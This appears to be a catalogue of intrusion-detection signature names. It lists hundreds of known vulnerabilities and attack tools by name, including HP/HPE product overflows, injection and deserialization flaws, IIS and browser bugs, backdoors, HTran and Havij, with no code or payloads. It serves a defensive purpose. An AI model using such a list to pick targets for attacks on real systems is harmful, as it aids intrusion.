HP-OpenView-Network-Node-Manager-Toolbar.exe-Cgi-Buffer-Overflow
HP-OpenView-Network-Node-Manager-Webappmon.exe-BOF
HP-OpenView-Network-Node-Manager-Webappmon.exe-Cgi-Host-Header-Buffer-Overflow
HP-OpenView-NNM-getnnmdata.exe-Cgi-Hostname-Parameter-BOF
HP-OpenView-NNM-getnnmdata.exe-Cgi-ICount-Parameter-BOF
HP-OpenView-NNM-getnnmdata.exe-Cgi-MaxAge-Parameter-BOF
HP-OpenView-NNM-ovutil.dll-getProxiedStorageAddress-BOF
HP-OpenView-NNM-ovutil.dll-Stringtoseconds-Buffer-Overflow
HP-OpenView-NNM-Snmpviewer.exe-Cgi-Stack-Buffer-Overflow
HP-OpenView-Omniback-II-System-Compromise
HP-OpenView-Operations-A.07.50-Buffer-Overflow
HP-OpenView-Performance-Insight-Server-Backdoor-Account-Code-Execution
HP-OpenView-Storage-Data-Protector-Buffer-Overflow
HP-OpenView-Storage-Data-Protector-Cell-Manager-Heap-Buffer-Overflow
HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow
HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow
HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-2
HP-Operations-Agent-HEALTH-Packet-Parsing-Stack-Buffer-Overflow
HP-Operations-Agent-Performance-Component-Last-Chunk-Buffer-Overflow
HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow
HP-Operations-Manager-Server-Unauthorized-File-Upload
HP-Photo-Creative-Audio-Record-ActiveX-BOF
HP-Point-Of-Sale-Opos-Driver-Oposposkeyboard.ocx-Open-Method-Buffer-Overflow
HP-Point-Of-Sale-Opos-Driver-Opostoneindicator.ocx-Stack-Buffer-Overflow
HP-Power-Manager-Administration-Web-Server-Stack-Buffer-Overflow
HP-Power-Manager-Form-Export-Logs-Buffer-Overflow
HP-Power-Manager-Form-Export-Logs-Directory-Traversal
HP-Power-Manager-Login-Buffer-Overflow
HP-Procurve-Manager-Snac-File-Upload
HP-Procurve-Manager-Snac-Getdomaincontrollerservlet-Policy-Bypass
HP-Procurve-Manager-Snac-Updatedomaincontrollerservlet-Code-Execution
HP-Release-Control-Authenticated-Privilege-Escalation
HP-Service-Virtualization-Autopass-License-Server-Directory-Traversal
HP-Sitescope-Emailservlet-Information-Disclosure
HP-Sitescope-Integrationviewer-Default-Credentials
HP-Sitescope-Issuesiebelcmd-Soap-Request-Code-Execution
HP-Sitescope-Loadfilecontent-Soap-Request-Information-Disclosure
HP-Sitescope-Log-Analyzer-Information-Disclosure
HP-Sitescope-Multiple-Directory-Traversal-Vulnerabilities
HP-Sitescope-Soap-Call-Apipreferenceimpl-Multiple-Security-Bypass
HP-Sitescope-Soap-Call-Apisitescopeimpl-Multiple-Information-Disclosures
HP-Sitescope-Soap-Call-RunOMAgentCommand-Command-Injection
HP-Sprinter-Tidestone-Formula-One-ActiveX-Multiple-Memory-Corruption
HP-Sprinter-Tidestone-Formula-One-Defaultfontname-Buffer-Overflow
HP-StorageWorks-File-Migration-Agent-Rsacifs.dll-Stack-BOF
HP-StorageWorks-File-Migration-Agent-Rsaftp.dll-Stack-Buffer-Overflow
HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution
HP-StorageWorks-Virtual-SAN-Appliance-Command-Execution
HP-System-Management-Homepage-Command-Injection
HP-System-Management-Homepage-Iprange-Parameter-Code-Execution
HP-System-Management-Homepage-Iprange-Stack-Buffer-Overflow
HP-System-Management-Homepage-Red2301-Redirecturl-Cross-Site-Scripting
HP-Universal-CMDB-Default-Credentials-Arbitrary-File-Upload
HP-Universal-CMDB-Server-Axis2-Default-Credentials
HP-UX-LPD-Buffer-Overflow
HP-UX-Remote-Line-Printer-Daemon-Logic-Flaw-Vulnerability
HP-VAN-SDN-Controller-Command-Injection
HP-Virtual-Rooms-Install-Multiple-Remote-Buffer-Overflow-Vulnerabilities
HP-Web-Jetadmin
HPE-Data-Protector-Exec_Bar-Username-Buffer-Overflow
HPE-IMC-Accessmgrservlet-Classname-Insecure-Deserialization
HPE-IMC-Customreporttemplateselectbean-Expression-Language-Injection
HPE-IMC-Deployselectbootrom-Expression-Language-Injection
HPE-IMC-Devgroupselect-Expression-Language-Injection
HPE-IMC-Forwardredirect-Expression-Language-Injection
HPE-IMC-Iccselectdevtypebean-Expression-Language-Injection
HPE-IMC-Ictexpertdownload-Expression-Language-Injection
HPE-IMC-Icttableexporttocsvbean-Expression-Language-Injection
HPE-IMC-Operatorgrouptreeselectbean-Expression-Language-Injection
HPE-IMC-Plat-Redirectservlet-Parafile-Directory-Traversal
HPE-IMC-Saveselecteddevices-Expression-Language-Injection
HPE-IMC-Sshconfig-Expression-Language-Injection
HPE-IMC-Topomsgservlet-Classname-Expression-Language-Injection
HPE-IMC-Tvxlanlegendbean-Expression-Language-Injection
HPE-IMC-Userselectpagingcontent-Expression-Language-Injection
HPE-IMC-Webdmdebugservlet-Insecure-Deserialization
HPE-Insight-Remote-Support-Processatatchmentdatastream-Directory-Traversal
HPE-Insight-Remote-Support-SetInputStream-XML-External-Entity-Injection
HPE-Insight-Remote-Support-XML-External-Entity-Injection-CVE-2024-53675
HPE-Integrated-Lights-Out-CVE-2017-12542
HPE-Intelligent-Management-Center-Accessmgrservlet-Insecure-Deserialization
HPE-Intelligent-Management-Center-Amf3-Externalizable-Deserialization
HPE-Intelligent-Management-Center-Bytemessageresource-Insecure-Deserialization
HPE-Intelligent-Management-Center-Dbman-Backupzipfile-Command-Injection
HPE-Intelligent-Management-Center-Dbman-decryptMsgAes-Stack-Buffer-Overflow
HPE-Intelligent-Management-Center-Dbman-FileTrans-Arbitrary-File-Write
HPE-Intelligent-Management-Center-Dbman-Opcode-10003-Filename-DoS
HPE-Intelligent-Management-Center-Dbman-Opcode-10014-DoS
HPE-Intelligent-Management-Center-Dbman-Restartdb-Command-Injection
HPE-Intelligent-Management-Center-Dbman-Restoredbase-SQL-Command-Injection
HPE-Intelligent-Management-Center-Dbman-Restorezipfile-Command-Injection
HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow
HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow-CVE-2018-7115
HPE-Intelligent-Management-Center-Getselinsbean-Expression-Language-Injection
HPE-Intelligent-Management-Center-Iccselectcommand-Expression-Language-Injection
HPE-Intelligent-Management-Center-Imcwlandm-Ssid-Stack-Buffer-Overflow
HPE-Intelligent-Management-Center-Imcwlandm-Username-Stack-Buffer-Overflow
HPE-Intelligent-Management-Center-Mibfileservlet-File-Directory-Traversal
HPE-Intelligent-Management-Center-Perfaccessmgrservlet-Insecure-Deserialization
HPE-Intelligent-Management-Center-Perfselecttask-Expression-Language-Injection
HPE-Intelligent-Management-Center-Plat-Flexfileupload-Arbitrary-File-Upload
HPE-Intelligent-Management-Center-Platnavigation-Expression-Language-Injection
HPE-Intelligent-Management-Center-Primefaces-Expression-Language-Injection
HPE-Intelligent-Management-Center-Rmi-Registry-Insecure-Deserialization
HPE-Intelligent-Management-Center-Soapconfigbean-Expression-Language-Injection
HPE-Intelligent-Management-Center-Topodebugservlet-Insecure-Deserialization
HPE-Intelligent-Management-Center-Urlaccesscontroller-Authentication-Bypass
HPE-Intelligent-Management-Center-Viewbatchtaskresultdetail-Language-Injection
HPE-Intelligent-Management-Center-Webdmservlet-Insecure-Deserialization
HPE-Intelligent-Management-Center-Wmiconfigcontent-Expression-Language-Injection
HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal
HPE-Network-Automation-Permissionfilter-Authentication-Bypass
HPE-Network-Automation-RPCServlet-Insecure-Deserialization
HPE-Network-Automation-SQL-Injection-Remote-Code-Execution
HPE-Operations-Orchestration-Beanutils-Insecure-Deserialization
HPE-Operations-Orchestration-Central-Remoting-Insecure-Deserialization
HPE-Operations-Orchestration-Insecure-Deserialization
HPE-Smart-Storage-Administrator-Code-Execution
HPE-Systems-Insight-Manager-Amf-Deserialization-RCE
HTML-Empty-Input-Tag
HTML-In-HTTP-POST
HTML-Null-Character-Evasion-Method
HTML-Script-Detector
HTML-Tag-Detector
HTran-Connection-Bouncer
HTTP-427BB-HTML-Injection
HTTP-A1stats-Cgi-File-Disclosure
HTTP-Admbook-Php-Code-Execution
HTTP-Admentor-Admin-Asp-Vulnerability
HTTP-Adobe-Acrobat-ActiveX-Null-Byte-In-Url-System-Compromise
HTTP-Adobe-Acrobat-PDF-BOF
HTTP-Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting
HTTP-Adobe-Download-Manager-Buffer-Overflow
HTTP-Adobe-RoboHelp-Server-SQL-Injection
HTTP-Aglimpse-Cgi-System-Compromise
HTTP-Aktivate-Catgy-Cross-Site
HTTP-Alibaba-Remote-Command-Execution-Vulnerability
HTTP-Allaire-ColdFusion-cfcache.map-Disclosure
HTTP-Altavista-Query-Cgi-File-Disclosure
HTTP-Amaya-Sendtemp-Pl-File-Disclosure
HTTP-America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Code-Execution
HTTP-An-Httpd-Cgi-System-Compromise
HTTP-Anaconda-Directory-Traversal
HTTP-Anakonda-Clipper-Directory-Traversal
HTTP-Anhttpd-Isapi-Count-Pl-DoS
HTTP-Ans-Pl-Directory-Traversal
HTTP-AOLserver-Dotdotdot-Directory-Traversal
HTTP-Apache-Auth_LDAP-Format-String-Vulnerability
HTTP-Apache-Backslash-Directory-Traversal
HTTP-Apache-Chunked-Encoding-BOF
HTTP-Apache-Crlf-Resource-Starvation-DoS
HTTP-Apache-Host-Header-Default-Error-Page-XSS
HTTP-Apache-Memory-Consumption-Denial-Of-Service
HTTP-Apache-Mod-Proxy-DoS
HTTP-Apache-Mod-Rewrite-Module-LDAP-Scheme-Handling-Buffer-Overflow
HTTP-Apache-Mod-SSL-Custom-Error-Page-Non-SSL-DoS
HTTP-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability
HTTP-Apache-Potential-Probe
HTTP-Apache-Struts-Arbitrary-Remote-Java-Execution
HTTP-Apache-Struts-Directory-Traversal-File-Disclosure
HTTP-Apache-Tomcat-Snp-Information-Disclosure
HTTP-Apache-WebDAV-Propfind-Dir-Disclosure
HTTP-Apache-Win32-Pipe-Metacharacter-Attack
HTTP-Apache2-Consume-Memory-DoS
HTTP-Apple-Ichat-Aim-Url-Handler-Format-String-Vulnerability
HTTP-Apple-iPhoto-Xml-Title-Format-String-Vulnerability
HTTP-Apple-QuickTime-FPX-File-Handling-Integer-Overflow
HTTP-Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow
HTTP-Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow
HTTP-Apple-QuickTime-Plug-In-Security-Bypass
HTTP-Apple-QuickTime-RTSP-URI-Buffer-Overflow
HTTP-Apple-Safari-Regular-Expression-Heap-Buffer-Overflow
HTTP-Arbitroweb-Rawurl-Cross-Site
HTTP-Artmedic-Links5-File-Disclosure
HTTP-Awstats-Config-Parameter-Command-Execution
HTTP-Awstats-Configdir-Parameter-System-Compromise
HTTP-Awstats-Logfile-Parameter-Command-Execution
HTTP-Awstats-Plugin-Arbitrary-Command-Execution
HTTP-Awstats-Rawplugin-Log-Disclosure
HTTP-Axis-Storpoint-Authentication-Bypass
HTTP-Aztec-Forum-Admin-Password-Disclosure
HTTP-Backdoor-WANRemote
HTTP-Backdoor-Web-Server-CT
HTTP-BadBlue-Mfcisapicommand-Buffer-Overflow
HTTP-BadBlue-PassThru-Buffer-Overflow
HTTP-Bajerie-Four-Dots-Directory-Traversal
HTTP-Barracuda-Spam-Firewall-Img-Pl-Compromise
HTTP-Barracuda-Spam-Firewall-Preview-Email-Command-Execution
HTTP-Basilix-Webmail-Misconfiguration
HTTP-Bea-Interactivequery-Jsp-Cross-Site
HTTP-Bea-WebLogic-Admin-Console-Cross-Site-Scripting
HTTP-Bea-WebLogic-ConsoleHelp-Source-Code-Disclosure
HTTP-Bea-WebLogic-Star-Dot-Shtml-Code-Disclosure
HTTP-Berbew-Webber-Padodor-Trojan-Log-Upload
HTTP-Big-Brother-Hostsvc-Directory-Traversal
HTTP-Bigconf-File-Disclosure
HTTP-Bizdb1-Search-Cmd-Exec
HTTP-Blog-Torrent-Directory-Traversal
HTTP-Bnbform-Hidden-Field-Manipulation
HTTP-Browser-Usage
HTTP-Bugzilla-Globals-File-Disclosure
HTTP-CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution
HTTP-CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF
HTTP-CA-Multiple-Products-gui_cm_ctrls-ActiveX-Control-Memory-Corruption
HTTP-Cal-Make-Pl-File-Disclosure
HTTP-Campas-Cgi-System-Compromise
HTTP-Carbo-Icat-Directory-Traversal
HTTP-Carello-Add-Exe-File-Disclosure
HTTP-Carey-Internet-Services-Commerce-Directory-Traversal
HTTP-Cart32-ClientList-Disclosure
HTTP-Cart32-Expdate-Information-Disclosure
HTTP-Cart32-Remote-Admin-Password
HTTP-Catalyst-Remote-Command-Execution
HTTP-Cgi-Blackboard-User-Update
HTTP-Cgi-Cal_make.pl-Directory-Traversal
HTTP-Cgi-CGIForum-Dir-Traversal
HTTP-Cgi-DCForum-Command-Execution
HTTP-Cgi-Document.D2W-Information-Disclosure
HTTP-Cgi-FormMail-Command-Execution
HTTP-Cgi-HTDig_File_Disclosure
HTTP-Cgi-Jj-Sys-Compromise
HTTP-Cgi-Metertek-Pagelog.cgi-Directory-Traversal-Vulnerability
HTTP-Cgi-Nortel-Contivity-cgiproc-DoS
HTTP-Cgi-Nortel-Contivity-cgiproc-File-Disclosure
HTTP-Cgi-Nph-Maillist
HTTP-Cgi-story-Pl-Directory-Traversal
HTTP-Cgi-Webplus-File-Disclosure
HTTP-Cgi-WWWWAIS-BOF
HTTP-Cgiemail-Encoded-Newline-Spam-Proxy
HTTP-CGIScript.net-csChatRBox.cgi-Eval-Perl-Code-Execution
HTTP-CGIScript.net-csGuestbook-Eval-Perl-Code-Execution
HTTP-CGIScript.net-csLiveSupport.cgi-Eval-Perl-Code-Execution
HTTP-CGIScript.net-csMailto-Cgi-System-Compromise
HTTP-CGIScript.net-csNews.cgi-Eval-Perl-Code-Execution
HTTP-CGIScript.net-csNewsPro.cgi-Eval-Perl-Code-Execution
HTTP-CGIScript.net-csSearch.cgi-Eval-Perl-Code-Execution
HTTP-CGIScript_Net_csNews_Database_Information_Disclosure
HTTP-CGIScript_Net_csNews_Path_Disclosure
HTTP-CGIWrap-JavaScript-Execution
HTTP-Chetcpasswd-Buffer-Overflow
HTTP-Cisco-Double-Percentage-Url-DoS
HTTP-Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow
HTTP-Clamav-libclamav-PE-File-Handling-Integer-Overflow
HTTP-Cmd-Exe-System-Compromise
HTTP-Code-Injection-Attack-Tool
HTTP-ColdFusion-Admin-Password-DoS
HTTP-ColdFusion-Exprcalc-File-Disclosure
HTTP-ColdFusion-Openfile-File-Import
HTTP-ColdFusion-Path-Information-Disclosure
HTTP-CPanel-Multiple-Cross-Site-Scripting-Vulnerabilities
HTTP-Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow
HTTP-Crystal-Reports-File-Removal
HTTP-CS_Icecast-Server-Authurl-Stack-Buffer-Overflow
HTTP-Darwin-Streaming-Server-DoS
HTTP-Darwin-Streaming-Server-Dot-Dot-Slash-Msdos-Device-Name-DoS
HTTP-Darwin-Streaming-Server-Msdos-Device-Name-DoS
HTTP-Darwin-Streaming-Server-Parse-Xml-File-Disclosure
HTTP-Data-URI-In-Redirect
HTTP-DFind-Scanner
HTTP-Directory-Php-Command-Execution
HTTP-Diva-ISDN-Password-BOF
HTTP-Domino-Access
HTTP-Download-Cgi-Directory-Traversal
HTTP-DragonFire-Ids-Dfire-Cgi
HTTP-e107-ePing-Plugin-Command-Execution
HTTP-e107-eTrace-Plugin-Command-Execution
HTTP-Easydynamicpages-Config-Php-System-Compromise
HTTP-ECart-Index-Cgi-Art-Parameter-Command-Execution
HTTP-eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow
HTTP-Emumail-Cgi-Cross-Site
HTTP-Everythingform-Cgi-System-Compromise
HTTP-eXtropia-Webstore-Command-Execution
HTTP-Ezcontents-Globals-Php-Code-Injection
HTTP-Ezcontents-Module-Php-Link-System-Compromise
HTTP-Ezshopper-Loadpage-Cgi-File-Disclosure
HTTP-F-Prot-Anti-Virus-ACE-File-Denial-Of-Service
HTTP-F-Prot-Anti-Virus-CHM-File-Heap-Overflow
HTTP-Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF
HTTP-Failed-Authentication
HTTP-Filemail-Pl-System-Compromise
HTTP-Firefox-BMP-Parser-Buffer-Overflow
HTTP-Firefox-Executable-Image-Dragging-Vulnerability
HTTP-Firefox-Gif-Netscape-Extension-BOF
HTTP-Flatnuke-Id-Parameter-Directory-Traversal
HTTP-FtpLocate-Command-Execution
HTTP-Groupwise-Gwweb-Vuln
HTTP-Groupwise-ServletManager-Application-Admin
HTTP-Guestserver-Cgi-System-Compromise
HTTP-Guppy-Error-Php-Server-Remote-Addr-Php-Command-Execution
HTTP-Havij-SQL-Injection-Tool
HTTP-His-Software-Auktion-Directory-Traversal
HTTP-Hosting-Controller-Information-Disclosure
HTTP-HP-OpenView-Network-Node-Manager-Node-Parameter-Command-Execution
HTTP-HP-Performance-Manager-Apache-Tomcat-Policy-Bypass
HTTP-HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow
HTTP-Htgrep-Hdr-Directory-Traversal
HTTP-Hylafax-Faxsurvey-System-Compromise
HTTP-Hyperseek-Hsx-Cgi-Directory-Traversal
HTTP-IBM-Lotus-Domino-Web-Server-HTTP-Header-Buffer-Overflow
HTTP-IBM-Lotus-Domino-Web-Service-Denial-Of-Service
HTTP-IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution
HTTP-IBM-Lotus-Notes-Domino-Long-URI-Buffer-Overflow
HTTP-IBM-Lotus-Sametime-Server-Multiplexer-Stack-Buffer-Overflow
HTTP-IBM-Tivoli-Storage-Manager-Host-Header-Buffer-Overflow
HTTP-Ie-Anchorclick-Style-File-Import
HTTP-Ie-HTTP-Equiv-Meta-Tag-DoS
HTTP-Ie-Showhelp-Double-Colon-System-Compromise
HTTP-Ie-Showhelp-Double-Slash-System-Compromise
HTTP-IE5-Filename-Buffer-Overflow
HTTP-IIS-Active-Data-Streams-Source-Code-Disclosure
HTTP-IIS-ActivePerl-PerlIS.dll-Filename-Overflow
HTTP-IIS-Asp-Chunked-Transfer-Encoding-Heap-Overflow
HTTP-IIS-Asp-Server-Side-Include-Function-Vulnerability
HTTP-IIS-Bat-Remote-Command-Execution
HTTP-IIS-Bdir-Htr-Information-Disclosure
HTTP-IIS-BOF-MS99-019
HTTP-IIS-File-Fragment-Disclosure
HTTP-IIS-File-Request-Parsing-Vulnerability
HTTP-IIS-Form_JScript-Cross-Site-Scripting
HTTP-IIS-Hit-Highlighting-Authentication-Bypass
HTTP-IIS-HTMLEncode-BOF-MS08-006
HTTP-IIS-Htr-Chunked-Transfer-Encoding-Vulnerability
HTTP-IIS-Htr-Code-Fragment-Disclosure
HTTP-IIS-IDQ-IDA-HTX-Path-Disclosure
HTTP-IIS-Iissample-Discovery
HTTP-IIS-Index-Server-Path-Disclosure-Vulnerability
HTTP-IIS-Isapi-Dot-Printer-BOF
HTTP-IIS-Isapi-Filter-Denial-Of-Service
HTTP-IIS-Isapi-Global-Asa-Configuration-Vulnerability
HTTP-IIS-Isapi-Htr-Buffer-Overflow
HTTP-IIS-ISM-DLL-Administration-Vulnerability
HTTP-IIS-Malformed-Url-Denial-Of-Service
HTTP-IIS-Ntdll-WebDAV-BOF
HTTP-IIS-ServerVariables-JScript-Path-Disclosure-Vulnerability
HTTP-IIS-Unicode-Directory-Traversal-1
HTTP-IIS-WebDAV-MS01-016-DOS
HTTP-IIS-WebDAV-MS01-016-Search-DOS
HTTP-IIS-WebDAV-MS01-044-DOS
HTTP-Imagefolio-Cgi-Cross-Site
HTTP-Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow
HTTP-Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow
HTTP-Imall-Commerce-Script-System-Compromise
HTTP-Index-Server-Source-Code-Disclosure
HTTP-Info2www-Cgi-System-Compromise
HTTP-Infornautics-Getdoc-Cgi-File-Disclosure
HTTP-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
HTTP-Internet-Explorer-Com-Object-System-Compromise
HTTP-Internet-Explorer-Compressed-Content-Url-Buffer-Overflow
HTTP-Internet-Explorer-Content-Type-Buffer-Overflow
HTTP-Internet-Explorer-CreateTextRange-Vulnerability
HTTP-Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption
HTTP-Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption
HTTP-Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability
HTTP-Internet-Explorer-Multiple-Com-Objects-System-Compromise
HTTP-Internet-Explorer-Nested-Object-Tag-Memory-Corruption
HTTP-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation-Memory-Corruption
HTTP-Internet-Information-Server-Help-Facility-Cross-Site-Scripting
HTTP-Internet-Information-Server-Phone-Book-Service-BOF
HTTP-InterScan-VirusWall-Multiple-BOF
HTTP-Ipc-At-Chip-ChipCfg-Cgi-Information-Disclosure
HTTP-Ipswitch-WhatsUp-Maincfgret-Buffer-Overflow
HTTP-Ipswitch-WhatsUp-Web-Interface-SQL-Injection
HTTP-IRIX-Webdist-RCE
HTTP-Isapi-Extension-Buffer-Overflow
HTTP-JamMail-Command-Execution
HTTP-Libextractor-Multiple-Heap-Buffer-Overflow-Vulnerabilities
HTTP-Lyris-Listmanager-Read-Attachment-SQL-Injection
HTTP-Machineinfo-Cgi-Information-Disclosure
HTTP-Macromedia-JRun-4-Long-Url-Buffer-Overflow
HTTP-Macromedia_JRun_Isapi_Filter_Get_Request_Buffer_Overrun
HTTP-MailEnable-Examine_And_Select_Commands_Buffer_Overflow
HTTP-Mailfile-Cgi-File-Disclosure
HTTP-Mailman-Mmstdod-Cgi-System-Compromise
HTTP-Mailpost-Debug-Information-Disclosure
HTTP-Mailstudio-Cgi-System-Compromise
HTTP-Mambo-Globals-Php-MosConfig-Absolute-Path-Compromise
HTTP-Manpage-Lookup-Php-Buildmanpage-File-Disclosure
HTTP-McAfee-ePO-HTTP-Server-Header-Processing-Buffer-Overflow
HTTP-McAfee-Epolicy-Orchestrator-DoS
HTTP-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF
HTTP-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog-BOF
HTTP-McAfee-Subscription-Manager-ActiveX-Buffer-Overflow
HTTP-Mdac-Buffer-Overflow
HTTP-MediaWiki-Uselang-Php-Code-Execution
HTTP-Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution
HTTP-Microsoft-ASP.NET-Application-Folder-Information-Disclosure
HTTP-Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution
HTTP-Microsoft-FrontPage-Server-Extensions-Cross-Site-Scripting
HTTP-Microsoft-Help-Facility-ActiveX-Control-Buffer-Overflow
HTTP-Microsoft-HTML-Help-ActiveX-Control-Remote-Code-Execution-Vulnerability
HTTP-Microsoft-Ie-ActiveX-Object-IObjectsafety-Implementation-Code-Execution
HTTP-Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure
HTTP-Microsoft-IIS-Server-Name-Variable-Spoof
HTTP-Microsoft-IIS-Unicode-WebDAV-Authentication-Bypass
HTTP-Microsoft-IIS-WebDAV-Source-Code-Disclosure
HTTP-Microsoft-Internet-Explorer-Adodb.Connection-Execute-Memory-Corruption
HTTP-Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
HTTP-Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption
HTTP-Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption
HTTP-Microsoft-Internet-Explorer-Data-Stream-Handling-Memory-Corruption
HTTP-Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow
HTTP-Microsoft-Internet-Explorer-IsComponentInstalled-BOF
HTTP-Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow
HTTP-Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability
HTTP-Microsoft-Internet-Explorer-PNG-Image-Rendering-Buffer-Overflow
HTTP-Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow
HTTP-Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow
HTTP-Microsoft-Isa-Server-HTTP-Request-Smuggling
HTTP-Microsoft-Management-Console-Cross-Site-Scripting
HTTP-Microsoft-Office-MSODataSourceControl-ActiveX-Control-Denial-Of-Service
HTTP-Microsoft-Office-Web-Components-Datasource-Code-Execution
HTTP-Microsoft-OLE-Automation-String-Manipulation-Heap-Overflow
HTTP-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow
HTTP-Microsoft-SMTP-Service-Data-Transfer-Command-Denial-Of-Service
HTTP-Microsoft-Troubleshooter-ActiveX-Control-Buffer-Overflow
HTTP-Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Code-Execution
HTTP-Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption
HTTP-Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow
HTTP-Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow
HTTP-Microsoft-Windows-Shell-MSHTA-Script-Execution
HTTP-Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption
HTTP-Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption
HTTP-Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow
HTTP-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption
HTTP-Microsoft-Word-Section-Table-Array-Buffer-Overflow
HTTP-Microsoft-Xml-Core-Services-ActiveX-Control-Code-Exectution
HTTP-Microsoft-Xml-Core-Services-Memory-Corruption-Vulnerability
HTTP-MiniWeb-Negative-Contentlength-DoS
HTTP-Miva-Htmlscript-Directory-Traversal
HTTP-Morfeus-Scanner
HTTP-Mozilla-Command-Line-Url-Command-Execution
HTTP-Mozilla-CSS-Moz-Binding-Cross-Site-Scripting
HTTP-Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow
HTTP-Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution
HTTP-Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution
HTTP-Mozilla-IDN-Encoded-Hostname-BOF
HTTP-Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption
HTTP-Mozilla-Products-Malformed-Gif-Buffer-Overflow
HTTP-Mozilla-Products-Regular-Expressions-Heap-Corruption
HTTP-Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption
HTTP-Mozilla-Suite-DOM-Property-Code-Execution-Vulnerability
HTTP-MPM-Guestbook-Pro-Header-Php-Code-Injection
HTTP-Muieblackcat-Scanner
HTTP-Multiple-Content-Encodings
HTTP-MyBB-Domecode-Function-Php-Code-Execution
HTTP-MySQL-MaxDB-Webtool-WebDBM-Database-Buffer-Overflow
HTTP-Nagios-Content-Length-Handling-Buffer-Overflow
HTTP-NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow
HTTP-Net.Commerce-orderdspc.d2w-SQL-Injection-Vulnerability
HTTP-Netscape-Enterprise-Server-Index-Disclosure-Vulnerability
HTTP-Netscape-Enterprise-Server-Revlog-DoS
HTTP-Netwin-CWMail-Buffer-Overflow
HTTP-Newsletter-Zws-Ulevel-Information-Disclosure
HTTP-Novell-Convert-Bas-Dir-Traversal
HTTP-Novell-eDirectory-HTTP-Headers-Denial-Of-Service
HTTP-Novell-eDirectory-HTTP-Server-Redirection-Buffer-Overflow
HTTP-Novell-Groupwise-Messenger-Accept-Language-Header-Buffer-Overflow
HTTP-Novell-Groupwise-Messenger-HTTP-POST-Request-Invalid-Memory-Access
HTTP-Novell-Groupwise-WebAccess-HTTP-Basic-Authentication-Buffer-Overflow
HTTP-Novell-iManager-Tomcat-POST-Request-Denial-Of-Service
HTTP-Novell-iManager-Tree-Name-Denial-Of-Service
HTTP-Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-BOF
HTTP-Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow
HTTP-NPDS-Thold-SQL-Injection
HTTP-Nph-Test-Cgi-File-Disclosure
HTTP-Nullsoft-Winamp-Ultravox-Ultravox-Max-Msg-Header-Buffer-Overflow
HTTP-Omnicron-OmniHTTPD-visadmin.exe-Resource-Starvation
HTTP-OmniWeb-JavaScript-Alert-Format-String-Vulnerability
HTTP-Oneworldstore-Owofflinecc-Information-Disclosure
HTTP-Oracle-Bea-WebLogic-Transfer-Encoding-BOF
HTTP-Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution
HTTP-Oracle-HTTP-Server-Isqlplus-Cross-Site-Scripting
HTTP-Oracle-Suspected-Probe
HTTP-Oracle-XSQLConfig.xml-Information-Disclosure-Vulnerability
HTTP-Oracle9i-Source-Code-Disclosure-Vulnerability
HTTP-Orbit-Downloader-Url-Processing-Stack-Buffer-Overflow
HTTP-osCommerce-Response-Splitting
HTTP-Pafiledb-Session-Authentication-Information-Disclosure
HTTP-Panews-MySQL-Prefix-SQL-Injection
